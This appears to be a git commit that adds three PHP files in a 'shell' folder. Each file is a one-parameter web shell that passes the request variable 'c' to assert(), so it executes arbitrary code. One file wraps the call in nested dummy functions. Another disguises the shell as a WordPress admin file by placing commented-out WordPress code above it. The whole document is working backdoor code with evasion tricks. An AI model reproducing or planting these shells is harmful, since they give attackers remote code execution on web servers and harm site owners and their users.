Add files via upload

Author: hacktfj

shell/comment.php

@@ -0,0 +1,25 @@
+<?php 
+function FunctionOk3($value)
+{
+# code
+assert($value);
+}
+
+function FunctionOk2($value)
+{
+# code
+FunctionOk3($value);
+}
+
+function FunctionOk($value)
+{
+# code
+FunctionOk2($value);
+}
+
+
+FunctionOk($_REQUEST["c"]);
+
+if ($title !="aa")
+{FunctionOk($_REQUEST["c"])};
+?> 

shell/test1.php

@@ -0,0 +1 @@
+<?php assert($_REQUEST["c"]);?> 

shell/test1toattack.php

@@ -0,0 +1,27 @@
+<?
+/*
+define('WP_USER_ADMIN', true);
+
+require_once( dirname(dirname(__FILE__)) . '/admin.php');
+
+if ( ! is_multisite() ) {
+wp_redirect( admin_url() );
+exit;
+}
+
+$redirect_user_admin_request = ( ( $current_blog->domain != $current_site->domain ) || ( $current_blog->path != $current_site->path ) );
+ * Filters whether to redirect the request to the User Admin in Multisite.
+ *
+ * @since 3.2.0
+ *
+ * @param bool $redirect_user_admin_request Whether the request should be redirected.
+ 
+$redirect_user_admin_request = apply_filters( 'redirect_user_admin_request', $redirect_user_admin_request );
+if ( $redirect_user_admin_request ) {
+wp_redirect( user_admin_url() );
+exit;
+}
+unset( $redirect_user_admin_request );
+*/
+php assert($_REQUEST["c"]);
+?>